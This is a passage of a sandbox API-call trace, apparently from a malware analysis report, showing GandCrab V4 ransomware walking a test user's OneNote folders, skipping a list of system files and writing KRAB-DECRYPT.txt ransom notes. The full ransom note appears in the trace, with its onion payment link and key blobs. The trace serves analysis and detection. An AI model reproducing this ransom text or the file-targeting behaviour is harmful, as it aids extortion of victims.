v2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.453] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.454] CloseHandle (hObject=0x434) returned 1 [0091.454] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.454] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.454] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x28b)) [0091.455] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.455] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.455] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.455] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a08d2ca4dee3d.lock") returned 73 [0091.455] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0091.457] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.458] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\") returned 50 [0091.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*" [0091.459] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd920 [0091.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.459] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.459] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.459] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0091.459] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0091.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a08d2ca4dee3d.lock" [0091.459] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.462] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 78 [0091.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a08d2ca4dee3d.lock") returned 73 [0091.462] lstrlenW (lpString=".lock") returned 5 [0091.463] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.463] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0091.463] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.463] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.464] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.464] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0091.464] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0091.464] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\KRAB-DECRYPT.txt" [0091.464] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.464] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\KRAB-DECRYPT.txt.KRAB") returned 71 [0091.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\KRAB-DECRYPT.txt") returned 66 [0091.464] lstrlenW (lpString=".txt") returned 4 [0091.465] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.465] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0091.465] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\KRAB-DECRYPT.txt") returned 66 [0091.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\KRAB-DECRYPT.txt") returned 66 [0091.465] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.465] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.465] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0091.465] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.465] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.465] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.466] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0091.466] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0091.466] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.466] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0091.466] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.466] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.466] lstrcmpW (lpString1="My Notebook", lpString2=".") returned 1 [0091.466] lstrcmpW (lpString1="My Notebook", lpString2="..") returned 1 [0091.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="My Notebook" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook" [0091.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\" [0091.466] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.466] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.467] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.467] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.467] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\\\KRAB-DECRYPT.txt") returned 79 [0091.467] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0091.470] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.470] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.471] CloseHandle (hObject=0x3a8) returned 1 [0091.471] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.471] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.471] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x29a)) [0091.472] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.472] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.472] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.472] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a08d2ca4dee3d.lock") returned 85 [0091.472] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0091.473] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.473] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\") returned 62 [0091.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*" [0091.474] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd3e0 [0091.474] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.474] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.474] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.474] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0091.474] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0091.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a08d2ca4dee3d.lock" [0091.474] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.474] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0091.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a08d2ca4dee3d.lock") returned 85 [0091.475] lstrlenW (lpString=".lock") returned 5 [0091.475] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.475] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0091.475] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.476] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.476] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.476] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0091.476] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0091.476] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\KRAB-DECRYPT.txt" [0091.476] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.477] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\KRAB-DECRYPT.txt.KRAB") returned 83 [0091.477] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\KRAB-DECRYPT.txt") returned 78 [0091.477] lstrlenW (lpString=".txt") returned 4 [0091.477] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.477] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0091.477] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.478] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\KRAB-DECRYPT.txt") returned 78 [0091.478] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\KRAB-DECRYPT.txt") returned 78 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", 